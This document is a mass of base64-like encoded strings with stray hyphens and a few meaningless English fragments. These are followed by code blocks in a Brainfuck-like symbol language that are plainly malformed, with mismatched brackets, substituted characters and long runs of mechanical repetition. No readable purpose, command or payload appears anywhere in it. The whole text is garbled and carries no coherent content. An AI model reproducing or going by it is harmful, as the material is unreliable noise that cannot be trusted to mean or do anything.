E4sMmApp82tilLxd6+WQunu8sg0ebiieq6E7O4QTY8/9y4li2FCbE3inXmuuyrs4XE5tJTQckKBwOX5TzQqcTw5J5tRn5aH3Ae1um6Jro Ree 0BtlN0r6LFAD0Nd46xA1I2Hkejz8sQNaK8+zmcVGJ52n8RISuKiJbBdabrS8Wq5oyo4mdjeT9cppVZ1jwZnahJXu5XD+ctD6RoRED bf0M/rz2SatkgMOohSu8pcAn2DR02/bdBJLAgFL78471aq2EhUsxkuYPDldB2sJcUp/mhu5SML/-

0v0yqZVWEtHPdkDjVa7maas+R6FZx2GCnoB8GJO6LeqlNgNHBrXv5QpbdsqrauK47ONCBfHtf0UWPrhDYxTIUc0Qfk0yP2CZKhf7zj4I5

N3RXAzncYg0zqlfxFqhdO/EKXjgDXmT09ocVcWKWxS9ghivj/x6Vy0t+3Yw1pVb1hV6Xx85n2wBQ4XkdxbyQejLxkxUi1xzZsCPFyn9niDsxbwK+Yoz44DzMePDA1MKymIkySr06poH+H7nj6do/-

rgVLVS/-

bwAioE29oOa+JFVq+njEa8EqxwPtBnYxxtOXcHsnixlRv3NnJ9eaygbGbliUHBO3C5+UK9YAF+wiEZPgZ+oIB7kxwfoNVD3yP6G8LUXz

Qn5qWkmXrNMKjeTDUdyUAH3Y1KU0qdsKNbx2b9hjsApb7xCepo27YbXX2JSiGJ6yRCCBmwuD2nQqLRYNuJz+B0bcMoAYfWU55GFoundation and the control of the controlr4puY3pvXjsDOlOjm9Z6xXg7Er36O/JFlnkoXT/4JxEyznNHrz/b9e+o6FUqPJGQV78jq10FPHmR/p8tVO2q9noWWBayJgravHl6c/-

wkNxfP76teQQnmzxOCVsuLsZXfK774yCPHJzgrUZBn3IPKVIk4dZTbxu+LQ6vyvkHrNJp48vmO33J3tRhSkmwKQnE5em4QeDj0DKQ4u FPq15QxPKyO8BUQud3In8QHyIpGTGx17F4IscWo2Eddw5MMH9B54vKn9NR7ItkIZG+qbriU4bnJh5V7fKa0nELF4WBQ7pmj5RyBmGM ye82vwjT+ecZ+IKTOD1BuS1N0URgTpYlwvhGYLGkvZSbkDEyaXGVxEs9d62QTEcBCbOt+Qj+0xzFBHaxpHWOCTAli43/-

HsMpSNNIbjN6IN8Lr0IiCzWsuxRe3Xkd9h+4+ot/x6mlpTOxTcCWMD/-

NSms+ahdTZSUxYhF+4UsFWqD/x/hprii2YSBa8ruL71ELdhRm/-

yC+zWyQkP8N05UQKuoYTtDWRHJXM9O0O1PDfdFhZzrGzMaPQ72f/mE9SDGI/-

vkseL5XmOyOpCXe5PSy17LJWB4CrDFiC9sskjqtqAeFtw+tXDZlcoilIjnEqeioiwmfuc3mRUhoJvMfcht9HZzG1pw1+ZLftZIFRpjb3mIHV 6vR2T83Msgr9QUa31UNaDgudQKilsIdgrvDj7lzHNOGFgX4fcPfBMR795y1faheZOb4aOlv6CWAZLK7iaeRrBlL3QGwXJm7s1NTITIoip5 Xc0KQiJdzP4+dBjpPnkHw+2UMEt5GIMM6haayJk31mH27HwCKRRLP/-

wlSwejw+nnNXy1qUPfbOHYa84BGdY6ht6p2F6tpMoXL7HxYaQXXFTKzkHO4KG6amoqpZ3+Y/sVWmDrq6VUbUCrQma/nscSfKrkwTNObDe7jfU1bQK72F2M5cdK5hrrD1TxgZI9JP/-

eA+eAxrRydor+7NyllyC4KbyTl6L08mXVTIMM88nW7yyKi2IWgHWGjpqSk5hiJS6Ea26e2GFM0UM5otFLwJCDTO+u/-

boVUk6TFWhLOKR8f2ACSJ6oLfcev36eSu/YvfBohwnIGkFovV3kxUpkOnISC/TQfrUeo11I/-

EP96IxV77zEBrVySrXYjdsVW2TYJhnhgJxrWzjhOx5jgiN6XXJtf7vji3sHKCDG6H+zvOPhzulJqBh0Wv5aImFpY7dzsaj5CHcBlqvdXjawt2l Kq8bHigBrT20RbIZ0O1J6myDNys0GWwTE11vzGgVT9QI7C5Dm6/N1LQEdkhsb3ZY9aUEUxJ8k+tuVDnm/-

4XiqIgCosnuHP54tQqJXbrdPZFy+0rhQmGOyO+cQ52RbcppJiXbsGIqC6qaiodc4ZU2F1k9uwc7CReXstQIEIycfFVPC14kMf9BRsaGj/lf9GdZwfE+Xx3ItrTUwZ6BKigINJpvPj1+q9nFqtKSCHatEBAsu8/uJjXRIY2JfG0I/-

WCVYxXbSxmpZh7gh1sFflIZRnGfl8nRCnzjb1vDFwDTmGX/-

3Tfu9iE9ImY9hASH0ZzEVoWXASRZqSttDV0uTsJLW0/0pna4YZlaRxScTeytpNCtL5u4o0XWMSERzIK+BTxrBUtlGBNVe1+SpWEgyRNL oAUDD7pSNCPdNNI5Bqt7VdxPuMP6owr72tiZicvSh5miNJKyumEdLF1VK8qtkZeyYOzwCfbkTvoX+JSTwLXTkc8OUIISveVBZkDEGOFA2 hWeKk7vn0JK/-

iynFiCqvqc2rvgtD9HWe1R3KXQECRyU0uGj0zqfymXb92Hdm8lwlBvDIPKAc3kTJy6eRPszvLpEsG8ZmMq9CH1t8fl0uQGS53+Pw27zS Ae1MiaXrWcVLgImTANj4PuEucueYWAtrF0oQ8WHzZCiuy2ErK8k7AoW17GZkWSpyp3J9ZYhheqh25cFjVUFCrEhG0MtGUJnAWsS09Q 2tpwbbSV4OTMJh+mqka8sIBSN5KwKKuoTYUB1SkSTqkBCeCtWylSjOMShQlUDqkXCl3qy6DGJd82XrYsXK2xff4se7z3f+f1nEOEhi51j kHAreozn1vtRBYWDR7A1rfCbtsPt9WGDaEYP36swPcFHMUa2EI2QUJhpvdq3q70BzLSXfivuORyPs+NJ/-

```
w3HrbvjnZ1c5YsGC1Sqv0Q1LRbyrEc2n42+Kc6ZbOK+Dwxaa4/v0FLvgyHGhbbnZ33chAjG8gC/G7Z3KpA36C+BM6cf6nVm/-
O2aFpCdiQESiueL9yb/JZ9isSFEFgZaSfg1y3opEwqkAdU8qYOhER16Hs3H4vW83DnK+T7cg3CYhx7mLulpPdVr8jLB/-
Pnr0JJmmqtbEk9gT5GYouV9s+PEo9SdESzb5CSootiLCf8bkcEaxyIdoZJKz52DYXeXfF9RyzpQQVdLf9IzwfJqn7/-
oiT+LWyITQqOM48EHctdo30FZbZQUJHPJqrjZO09/rA0H2vQFYuIVYI20maIhMk/-
0178ZURtQPOjcGruaPqUUrvYYFrD8ac2ydu2TinZx2t9LyqGTmUuI+Q2t+w+/X+FCqACZ0Yc+v4CvnQXvMmZgM/-
LxRstRgwqjZbGrJQxuVKJaq0wkpWsraOlj6iOArinpO6Y0hcHGyIUYjoIH6eJnU6Rc0NEiF8xMIKCLT5rnHBL2H+wVJfCQfiBEjv7p4V+pnqi
f6Vn1nfGhLQj4M6rtbDPw4U5RsHD8KtFan0h1OKQSZTGMVBI/17r84RmFim/HIAJT/j42MKIMfmLw7pJ4IWDsT7I73/-
UTSA6OgSf1XWWiuJwS7SDX8raAoMJ7gT0V+5uV7GtZuoFYjxGWRQgfCybnPiCVHRYBbY0GBdiNCUe150isZyCX1CZI/Xu+/-
g40DeCjABrxHzy2L4Abm588Ql1AMTzkNETeK/UhDaPPr6yWlpl3Q6WxbOmJae+dqX8tIHTA3AVK4bNgt6n4gW/-
UQinBr953cCOmHF7dderyT+VOKnx+EvVZSBaOTp35KQ7TxGYshuJDLGHdfbAkBVIwqfjzgb2l20/-
UsIzeEKnSahKWCtWTc7eEY8sTqcU5VVzk01jpQJ3Fnz8Qr+7228HjImjkSgThOqKP+ioXz36oyG/hFciRbPU6knG/-
rLe8TGpNC5IXM+6i4a5ubd6SpdiPwQ1hyGMhxGVdpeXw8irn89xq2WvzKDOy82Ukv8N9hpQFR6EGpxlHtdLZsdLPV93W+G03PHPOI
f6svxlzZKiUO70RIINz4OLkTDaCccT9ZSUOTS0CVWIYgjqTqa6AatUd1HNWjQbzreRuLjvIECSTdQq/-
XWx5TLB353QSy3tmzk93wn0c4bnR+dgL+m/-
Zm4afhX65kaZe348YHG0hDs8k5PDF0N9j46uTh9Zv2RdHq9cbqgdZbFzSgxlsy7Bi2vwN3+OgeeivQ+jHxvXc+z2F4Q0qTLPcGKogc1
5PHWwcZIN1ce5vFz/yowcPxvRdonbPLixfuTagBTUtiRz6quvzF2nSJRh1Qky/mhV+-
```

Kd53IY6qVn5CVutLR00DbtrQfomH00AlAwmLttBDtcylV3s6C8ug9XGESMyXStytA9taW/-H9UdUiGlvDK6GCF2tXalaSivkqZanwlg6BTrrB/-YJ5O93kOqBQNqyY1SIx9pk39IAJt5xw1Gz6+KAuPdFzzPw7wNgJmm3nWd6BDpyEa3vr9GdJ+gTHmq1zbjuT65vDPNac3rtpzijQwz8bc

Q5qimr0Q4nr+m80Enc8bhEJqrKx3Atjfx7G2LQme57xK3pWmfOu+AvGtm+B52bqGwAFlbbTJOKykvcWQ+jWd08ihCaxTQ6qUbjytz\

+gX9a2nXpqSc2VnOFQMc8Z1PssuDaGCcU+1xZQNWV0fPRMKxN6JbS3mWUnOuR7J25EpGP3tnUQBGugpuqho5WpYJ7gw9n/-

7IDaZBHjY8Iklh0XlsCOYOoq+pPXgRL8YLgGS39g+I7nRVt+snFkBeG0UHlbky+/Y6xzF2FgeHYZS+c5HrU0x6kHnUpUrv/TAnMsnOEu4WWwaqQ38MpNtRSTQK+ZmgSx0uu5yp5TM3wC8g+MVht9LQJSTu8xiaDDIHChh3NYXTCIKQ4Eklt35Z0ff1BdR+7jkkkV

+PAidgxMhlb3ahAwf59PVONx8anM+Hx4TjRJneFDkm5ZXrzrAyaO8MEnM6SksXZe+DuR6calkYAF/-

pTVXGEliKjsFDiE+KRRfK2TWprawWILPViryvDsEP8b2Dj/dlqC0VpM+Jjy/-

PXN/R3W9+cncdoDhTFzT9KfLzw78SFWuSWo0aWHyaWIMXH6rpYbuKXIO7F0/-

8ArVMGdOQpVR02NnlgGZkptD6w3601gpby+qv+7erHi8/-

m32coUySlbh1genWDbJFg2wtKc5KawQy+Z3PqkT5wNA6/-

+AEQ9Sk+WHjTxhJdGnq+In8BQZkEKIzvx4v4Pn/-

Q0gAKsNWbGHgdZ1hFkUzRGprhuXtOthuszFTQbU95+d8hDqvhomi1SNH4e7wSYp0PlQ641VIYMApozh239lhXvBqJZtINi3hNHcZ3L InL5d2PMaaYGJFwuiNOn03EGFQXBxpgEa66Wcv3BDC1ZgERZZ+3k6uDxpPTSSdCYWy8lWXVXSbkX7m0Q/PK0kCL/-

CnES68V73YMY7olSqKNQiTrdlNFkic3x6xLY2NlLuarnmkPu/1f6c6LNXX9Plx+Vxl7zcojOE11HzQCWm/-

rPhMpI0U1G92tfFevALVjPxCHQ0Ueojjof0S3f+hDR575MXehPgbpGSq/-

cOGMOjPj8TCBYx5wq9BnFfAY0kvl343PvLl0RYZmOl37NFnWjebljOigsb+RXY+Bk7CSQwO/DXzorVAf3pMZpnqMslpWqrid9/-sXXDVKjtTy7GiR8gsMaP0pLmq1TjWb4g2bFNmgFF9jhSJfh+G4Z1T5T6PQgouo2djWEfluCP/-

X8dIDDDjJARW37Tym5P3ehvbqIuL7RZTS1v9s8o5exCA9k2rn1OUcC6/1U0ZkWtjPlpo8HzRgsg5JNHtI4U7oPfrTA4dyJCZvwFPP6vqX74 se51upweX6YjPeWVqR9KV2IIGRBX/-

UmjaWVf2AldHegnbvauFhbPcLp+SA0+41t1DERJVsj1dLwQObBCo3zeJ8TlsnZ3JJndDcUAlVEFjhtygGzp1rdnJXxqazRGuFR+SAuy5LYakUXbyzJx6fLuCaLNf+i4SIdrKBWrvYR6z+NviZSq1ww1mWPsS42f9ZyC4EFnFibl0MNyaFbFtiLp9gGaL9aPtD0sy2bxXqDOyMH0gUelHs/ZtiCSEZqFMzGINNsQRUIPnADN22PRHbJciSMYXArBj2sOrkhc4DUkigDfVCsGCYupg9cGkE7etMa0R45SQ9gJPrNLZ18R/-skkZ8QLPubdm08ueE7/-

AKtunkRh+H700dqBmmnwF51TUqKWzQBWNES8m1o3X2HSvkKDgRTTh+cqQHq2d4ElkObSvwqsGdV56QSbLUR3mf4MAPqqjujKJoXRnRQYhsHRa8aI4IyxZsdAfZ9aJxSGIPd93JF+fViNHED1pE9DZNcnF/03FcHsqKJY6VEs/-

VGgXdVg48Kdh8c+tu5kZuBsSRboHaBJM1Y4cQdxJEj/gxlvrN/-

DAgGQBGjajy8WishUIfR1diF5vzi2ddgUDHNXYS8scXi3C+zj2RTanmn2I5QQTNM8WXF4ujhfxymzP8N5DXbHZ+B5qYCHUnbUQcIxl6uZJLmiIpU1yoTK9BHr3LUHiPPvlufjRinklUp9PQ/+CNiGKkmycCRZo1Po0pPh9wLKHwe07QkNOfAieF/xbgp2+V86Zmnu5kS9Cs/-Itfa2T8bvzYzXIWOKQzcE2/QuVpS2kJLazIMwT71FP+urKuS/-

OuS76VM4eG3qOi2ouyCR+1yJMocBk0g6FbTT3L+kh5JNi2Et8ehVStKUNmGvErGNxYGxJ6zNPQvsLGPnnvEF3FdenNQXgmKanK/-EgBLC38++ay5cytnnqVvvfTUTa0Ovpd9uuBNSGtZw6duyxACNSw356jADeiQgnDzKGwvOv2Lp0hnhziOrZjPub/-

SfnwEExxaWRdVeAw8YA+Lk0mdugl3EvmVddSUXsZKxmx8j4lbFnpIEOGBUs/kbNRxtKHRVzKO4Wk1OoQSjIYZaW/-

2Ot70CW9Kkalp6CD/U/AlLga3nDSy6Nb8abbshVCT+kqn6upt/-

h4N3oBtTUurHiCK6JTY6kNFzhCEEzaFFB+ZmZrvOc1acl57pvGZCVQrDD/-

rlgFZj4sxHJCw84ipi3IcqvryDHGOwOfwYNpe6Lf6GI5jwljUNF0kyJ+x/DTDQrA6IndFCeGP+Y3F+/-

WpCv6AbnLb7pouKPqD+Aszz+782aMY2V4di/-

7j5CKBFOnLNaACDC8DyihbRastyKPXwKOFB3+KjESEA1LAnXDbAFLmQgxJurFttLVbnkYD3PxnlsS8R63oF9wFCzqFK/-

ExRbTMNyWIYFUDb1JVF0C8Jq+7AFcQ1GdPKJAk4I7xM6s0moQd0aAmB/-

IEr5kWJqDZaAHNiGo3i3Va3MFUwudqwM2YwuSKP06fOEjEDcONnxWz+dFjJ58oc6rSRrf7WwCBCvYej17tJGJCHyX01pWAYINFnZCBvLjF5Is1IXv8o56euqvhGKJo3MtxgNqDIrrfBIIbabDNWR9LLVm0x2A505DVaLaWVMrn3KnywnpOwQd+NfJUki8EjmbX3psan8bQpzahVhRMC4BT46Ady8XRBgvwfTPI7N2n2Q83jBwMGC+om99EaGJdhV5/-

oZOCSygApFPVwyzaM+uluJdTcKjI38MZObWExOF4wsxHwpYeNXIvfPNd/GNVri/eDoi/ucnQlp+6q1qJ/-

NrbE+8dH8sSbjUha4uQGfr80kCZ7ThKP2IA40BrwGR5mZUYLqQrKXLOLhhLmM5vEqR41RMwLRBiV0cyoLq0o0I/-

2KZmVci+DUHybXXCu9fG0y+WN1P0jMqJyRz8IMC45OrdhD8KDFrPkDhChIDfBWB7NgX3zgXU+IpSwo9Ddlg7WVK0Nk58TO4KDhh8 Zt5hgiuqaHOcCmmVuUCr6NeeDex2kCnTlovjv+6NDD8qKrxpTt2jz3s2KtXB0gt+184SWsyeBzEbEgtax5w6q8OvxJFQ2WYmwVDDNrhU6Pr2N8Pu/JYyMs7AaZXhMld2QzUSjmY9pZ3y93S6Ei7LK7GMlgSDOSuroXuoR7tmJH0T6/-

pc9SXjLyWOFGkZN4ZCiP2j8f5h20X1Lw8p1H2hslzidKso3JXokBxpSVNCDZSf15qnlweycS+fRmxEpGXVXg46u2Nnh53nrs5w4re0lQxPv2t6VGr0Wtpjerk+eLiOkS2lCqA9qndImd0E8AedKqS9uMOlgtl6CbDQWRZkizTEu8FB4/tznFHs/-

JWIy+Tj0JMId5p+XsgiiMOINN26QCqBipxOygAxBBhxDXEIxjhivAaHBIO2K53G//t5E6TV/CyZxERDheZYaZU15VHxN/-

DqiFVOGjZCBQtZPcV6D/JT7OUjE21Ins7SmzeYfp87rR/-

GdRgg2UPsXR9tE4wEF7d2PHDemOn62eKtvGOu00EID67yLdCABVbGhQwEHMv6CCGLBV7+HprnPPxa0jieqdnwRojvF0LjyTFYVqCNvMuCNpQvD1rQOPmzXWXTFG3paECzL8W4OuRsnsIxQ7eUqpfeCYWn1mkzpw2lhjUJSQP1z5fFwKZJWF7NAdLQLV2PEhDQpKuGxtBksN

JSBDSnNPBc/YmkfrqpVQuRnGhcNI4784oyI/d9laqtZE6VhQpD7RMkTBSaBjgtZSgfCP5ANpkfoJ/P/-ijDsLRVHz0nAT8BC+gYMsZBijvRKb8Q0SIAEm0FQ3r0nGqH0Bu8LYtN8aTuIFyMwwEwLogrToF/wY/BIFQNLBBv1igSQb/-bxKZDwLj1IE4twg9bmi7WpLL/+UMWNYMetCj52IDgLyisn9B+0/W0/-

Tfd7qn5SLILAVrMICIYIfVWWsELCTIYTuLEpdo+HVAfxfh8RB3pZ3cG+uzCe1xSMcx0JfSld1Hfa3hJK75zVWwcfu4EvVZ1qhIZwtm7Ls=-

```
>+<]>.----->+(--->+(--->+++-)-.---(---->+<]>+.[---->+<]>.---[--->+<]>.-+++-.-[--->+++|>.--[--->++|>.--[--->+++|>.--[--->++|>.--[--->++|>.--[--->++|>.--[--->++|>.--[--->++|>.--[--->++|>.--[--->++|>.--[--->++|>.--[--->+|--->+|---|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|---|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|--|>.--|>.--|--|>.--|--|>.--|--|>.--|>.--|>.--|--|>.--|>.--|--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.--|>.
>+<]>-.----+(-->+++<]>-.[->++++<]>-.>+++<]>++.+[--->+++<]>.+[->++++<]>-.>+[-->+++<]>+
[->++<]>+.-.++(-->++<]>.-[--->+<]>.-[--->+<]>.--[->+++<]>-.++(-->++<]>+.>+[--->+
+<]>.[-->+<]>--.>+[-->++++<]>--.-[->+++++<]>---[->+++++<]>---[->+++++|
+++++.[-->+<]>++.[--->+<]>-.-[-->+++|
>+<]>-.--.>+[-->+++<]>+.---.[-->+++++++|>.--.[--->+++++++|->+++|->++++|->+++|->+++|>---.
+<]>++.+[--->++++<]>..[--->+<]>-.--[->+++++<]>+.-[--->+<]>++.>+[--->++<]>.[--->+<]>----..++++
+<]>-.[-->+<]>-.---[-->+++++++++------[--->++-|
>+<]>++.+[--->++<]>.+++++.-------[--->++++++++++.[---->+++]>+.+[--->+<]>.++[-->+
>++<]>+.+[---->+<]>++.[->++++<]>+.[-->+<]>-.[->++<]>+.+[-->+<]>+.+.-[->++<]>..++
++<]>.----+.+++++<]>+.+[--->++|>+.++|>---++|>+.+|----++|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-|>+.+-
>+<]>+.+++++++.>-[--->++|>---[-->++++|>.--.+++++++.--.+++++++|>.--+|>.--+|
>+<|>+++,---->+<|>,--+++|-->++|-->+++|-->+++|-->+++|-->+++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->+|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->++|-->+|-->++|-->+|-->++|-->+|-->++|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|-->+|
+.>-[--->+<]>----[--->++++<]>----+<]>+.++[---->+<]>+.++[--->+<]>+.++[--->+<]>+.++|
>+<]>----[--->++++<]>-----[--->+++<]>---->-[--->+<]>+++.>-[--->+<]>+++.>-[--->+<]>---->+<]>---->+
>+<]>-.>+[--->++]>+.+[---->+<]>.[->+++++<]>+.--.[--->++++<]>++.--[--->+<]>.[->++++++
+<]>-.>+[-->+++]>-.--[-->++|->+++|->++++|->+---[->+++|->+---[->+++|->+---]
>+<]>-.--[->++++<]>-.+[-->++|--->++|--->++|--->++|--->+-|--->++|--->++|---->++|---->++|
```

```
